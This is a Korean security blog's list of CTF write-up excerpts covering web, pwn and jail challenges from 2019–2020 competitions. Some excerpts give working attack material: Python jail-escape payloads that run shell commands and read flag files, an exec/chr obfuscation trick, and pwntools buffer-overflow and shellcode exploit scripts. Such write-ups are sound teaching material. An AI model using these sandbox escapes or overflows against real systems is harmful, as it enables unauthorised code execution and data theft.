Mineta's Space

CTF 검색 결과

해당 글 19건

Rice Tea Cat Panda

> 후기 늦게 시작해서 쉬운 문제들 푸는데 시간을 전부 써버렸다.. pwnable 문제가 없는 점이 좀 아쉽다. General Skills :: Come Eat Grandma Google Sheets에서 version history를 보면, 2019년 10월 6일 7시 44분에 oh, woah, a FLAG 라는 제목의 changelog가 있다. 확인하면 플래그가 보인다. ps. 모든 사용자가 수정 권한을 가지고 있기 때문에 이런 참사도 일어난다. Flag: rtcp{D0n't_E^t_Gr4NDmA_734252} General Skills :: Basic C4 BASE64 인코딩된 것처럼 보이는 문자열들이 있다. 한 줄씩 디코딩하면 아래의 결과를 얻는다. Hah, you thought Really? Di..

CTF/CTF Playground 2020. 1. 22. 04:56

[CISCN 2017] BabyDriver

全国大学生信息安全竞赛 2017 - BabyDriver [Pwn/450] babyopen int __fastcall babyopen(inode *inode, file *filp) { __int64 v2; // rdx _fentry__(inode, filp); babydev_struct.device_buf = (char *)kmem_cache_alloc_trace(kmalloc_caches[6], 0x24000C0LL, 0x40LL); babydev_struct.device_buf_len = 0x40LL; printk("device open\n", 0x24000C0LL, v2); return 0; } babyrelease int __fastcall babyrelease(inode *inode, file *f..

CTF/Writeups 2019. 12. 31. 03:38

Christmas CTF

web :: watermelon robots.txt를 보면 Disallow로 /.git가 있다. 이 파일을 통째로 받아서 git으로 열어보면 모든 파일들이 전부 삭제된 commit을 볼 수 있다. (다만 플래그와 recaptcha secret key는 존재하지 않는다) flag.php를 보면, 자기가 업로드한 트랙 중 좋아요가 1225개를 넘어가는 게 있으면 플래그를 보여준다. 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16

CTF/CTF Playground 2019. 12. 25. 09:10

Kipod After Free CTF 2019

Pwn :: Preflag 잘 찍으면 풀리는 문제다. ㄷㄷ 아마 flag 파일에 flag가 preprocess defined 되어 있을 것 같다. 1 2 3 4 5 6 7 #include #include "flag" int main() { printf("%s", flag); return 0; } 컴파일된 바이너리에서 문자열을 뽑아오면 된다. Flag: KAF{PR3PR0C355_L1K3_1_B055} Pwn :: Simple Authorizer 간단한 ROP인데 pwntools로 ssh 연결하는 게 처음이라 상당히 애를 먹었다. scanf로 입력받을 때 mov al, 0xB를 하면 vertical tab 때문에 문자열이 잘리므로 al에 0x80을 넣은 뒤 0x75를 빼줘서 0xB를 만들었다. 1 2 3 ..

CTF/CTF Playground 2019. 12. 22. 07:36

TUCTF 2019

Welcome :: Welcome Validate the discord account and the Bot will send the flag. TUCTF{W3lc0m3_70_TUCTF._H4v3_fun} PWN :: runme Run the binary and enter 'flag'. TUCTF{7h4nk5_f0r_c0mp371n6._H4v3_fun,_4nd_600d_luck} PWN :: thefirst PLT segment is modified, thus Hex-Ray can't see the C pseudocode normally. Let's take a look on gdb: gdb-peda$ pd main Dump of assembler code for function main: 0x080492..

CTF/CTF Playground 2019. 12. 1. 04:38

HCTF 2019 Beginner Section

newbie : Python Jail exec를 필터링하지 않는다. 이중 exec와 chr를 사용한 문자열 조합으로 원하는 코드를 자유롭게 실행할 수 있다. 1 2 3 4 5 6 7 8 line = 'exec(\'print(__import__("os").listdir("./home/pythonjail"))\')' line2 = 'exec(\'print(open("./home/pythonjail/flag").read(100))\')' ans = '' for c in line2 : ans += 'chr('+str(ord(c))+')+' print(ans) newbie : CryptoFile CryptoFile 클래스에서 encrypt 실행 때 seed를 현재 시간으로 초기화한다. 암호화된 파일의 시간을 Ep..

CTF/CTF Playground 2019. 11. 17. 23:50

Newbie CTF 2019

Pwnable: python_jail 1 2 o={x.__name__:x for x in object.__subclasses__()}['StreamReaderWriter'].__init__.__globals__['sys'].modules['o'+'s'];o.spawnlp(o.P_WAIT, 'ls', 'ls', '-la', './home/python_jail') o={x.__name__:x for x in object.__subclasses__()}['StreamReaderWriter'].__init__.__globals__['sys'].modules['o'+'s'];o.spawnlp(o.P_WAIT, 'cat', 'cat', './home/python_jail/flag') Flag: KorNewbie{H..

CTF/CTF Playground 2019. 11. 2. 06:48

[bugs_bunny 2k17] pwn100

...더보기 pwn100 메모리 보호기법이 아무 것도 걸려있지 않다. 여러 가지 시나리오를 생각해 볼 수 있다. docopy를 실행하고 내부에서는 gets를 호출한다. 따로 shell을 주는 코드가 없으므로 shellcode를 작성해서 고정 영역인 data segment에 쓴 뒤 실행해준다. 0x0804A000에서 0x0804B000에 wx권한이 있으므로 적당한 곳에 써준 뒤 점프하면 된다. from pwn import * import sys if len(sys.argv) == 1 : p = process('./pwn100') else : print 'Remote server is disabled' exit() gets_plt = 0x080482F0 data_seg = 0x0804A100 shellcod..

CTF 2019. 7. 16. 07:16

[bugs_bunny 2k17] pwn50

...더보기 pwn50 64bit ELF 바이너리, NX만 걸려있다. gets에서 BOF. if를 들어갈 수 있게 v6, v7, v8, v9를 맞춰주면 된다. from pwn import * import sys if len(sys.argv) == 1 : p = process('./pwn50') else : print 'Remote server is disabled' exit() p.write(chr(98)+chr(117)+chr(103)+'A'*21+p64(233811181)) p.interactive()

CTF 2019. 7. 16. 06:13